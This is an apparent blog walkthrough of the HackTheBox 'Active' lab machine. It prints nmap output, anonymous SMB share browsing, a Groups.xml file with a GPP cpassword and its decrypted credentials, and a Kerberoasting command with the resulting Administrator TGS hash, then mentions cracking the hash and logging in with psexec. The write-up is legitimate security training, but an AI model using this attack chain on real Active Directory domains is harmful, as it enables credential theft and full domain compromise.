HackTheBox “Active” Walkthrough
6 min readFeb 17, 2024
Active, an easy-level Windows OS machine on HackTheBox, started by discovering an open SMB share, initiating a journey through various stages of exploitation. Unveiling a Group Policy Preference password within the share led to decryption, ultimately revealing the Administrator user’s hash. Employing brute-force tactics, the hash was cracked, granting authentication as SYSTEM and enabling seamless maneuvering through the system.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -T4 -A -p- 10.10.10.100
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 17:03 EST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.100
Host is up (0.11s latency).
Not shown: 65329 closed tcp ports (reset), 183 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-16 22:27:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msdfsr?
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49171/tcp open unknown
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows 8 (96%), Microsoft Windows 7 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SP0 or SP1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Vista SP2 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-16T22:28:23
|_ start_date: 2024-02-16T21:21:46
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 105.65 ms 10.10.14.1
2 103.78 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1607.76 secondsNumerous open ports and running services were detected including SMB, revealing the OS as Microsoft Windows Server 2008 R2 SP1, with the domain name “active.htb” noted. To facilitate access, the domain will be appended to /etc/hosts.
Now, we will list the SMB shares anonymously.
And we found the share “Replication”.
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //active.htb/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>After exploring around, I discovered “group.xml” in a specific directory. Let’s download the file to examine its contents.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
┌──(kali㉿kali)-[~/Desktop]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>We discovered the username “active.htb\SVC_TGS” and its encrypted password, tagged as “cpassword.” Utilizing the tool “gpp-decrypt,” a Ruby program included in Kali Linux by default to decrypt it.
Using the obtained credentials (SVG_TGS:GPPstillStandingStrong2k18), we’ll attempt to access the Users share.
The Impacket collection includes a script named GetUserSPNs.py, designed to identify Service Principal Names (SPNs) linked to a specific user account. Running this script with the discovered credentials allows access to the requested valid Ticket-Granting Service (TGS) sets associated with these SPNs.
┌──(kali㉿kali)-[~/Desktop/impacket/examples]
└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-02-16 16:22:52.552948
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$513817c4ac3cb618e26dcafd5c878e75$1a544ba6d87282ffe667f68e2680b0826d17aacb79ec775e425004be7dd9040b876516dcb743406f94425e20d523a8850d3e312989a78a50229b6402bd1e0aa18700c9335f5b06f7a76234b1500e72be11941b3547a545c5569123ce52b89a6bd68fe734eb525144a67a7d3b2e670df9426cabf4097e86b2f3e5c9b9eb49d7d4703e9b71f419b2c9bc718796fe65ee3d7930204b9def01b1e291bfdce9aa9c9d9078a5bd7b4b02479db39ea0732980ffc25d1431bf78078a7a0e826eccc5c87b7c471381c357fc98d3c595d6002ca476cbbf00ed6875398bd7e29f88081aaf053eb95d98b004f879f8c827ad4824e30d6e34b2e7ca1bd9bcd07aec2cf377ead5ac96804e4347dab86572d8d5bb2f3ca8f49a1edfe04a496e393f0b5c2c7d75ab1c382f75e313520ed6ccf8a1308fc1dc7b224f4db6797e7258b5e365b9604fd6331b4a0e64f34c292d7be533ace40b4f744ba230237f04b551143da6ab2477b1e54748007d974416b420578f78baa1b8250394f5701aceef36f4e1796adba1b20670f838034accd6040e1113b23deaa97a85bc3d5498ab1e69b104a98c2db9fef145e1674dab64cb1c5c2c4185ffb6304074ca74a2148d3617a8d8f6f3a646ee73cc3bd8478812da5c49e1736b4ffbb28dae3747c5bfe8809de4642e64d51956c21438b7636c9f9f7ff578c12b483546dbfe74ab6093c175713ee963bd267da590fe76d028d78ae7f4d5c3117f8d534e290d7d164119e1d6544c1949f0c8cf3ee9888041e18350d20df6c35f4c1af1e1fdf825470ddc84ca06524f6fe76cbde63712a66dc6f98939d73a157528d0e8fe68afda6b8c691faad7bd5fc367d38ce052f1d3c31c0a2cf9a40ee728858b3f8ae840f30d50b5eef77c71170e454ac13e54d9c86dee447f8c8d1ba31b0e481d52ab19beb5b3e2dd9a43da84741b47053e770f6f4645a6e313bd382d8af22c66aee9b8c777ed4caec3814982f8a1024d5808386958c3609296b4b093db2519a0d4204d0d1c5fd8d8ca9d925754c15496a0c2513115cca8e1f3dd7796eb11de75ab4c10ab8522ceeadc2bc5fd57884b0a2edb8e3e286a7c3c6e20d4515c98e9cb7929243b4eb07b8bcd6f6b9db8b1e40b0666dc5fad04809b4db7a497a265d283fa6042c7c333eb4be75fb9355902c41270949c169108fb7a70ef60685e1e1e7ddc05496de069af6dadf2d8f5110ad9997365fc39785355f60d8f6ee54a436d8039d8b0938d5fdae4e908a7We obtained a TGS from an Administrator SPN, our next step is to crack it and potentially escalate privileges. Let’s proceed using John The Ripper.
To access as the administrator, we’ll utilize psexec.py.
Cheers.
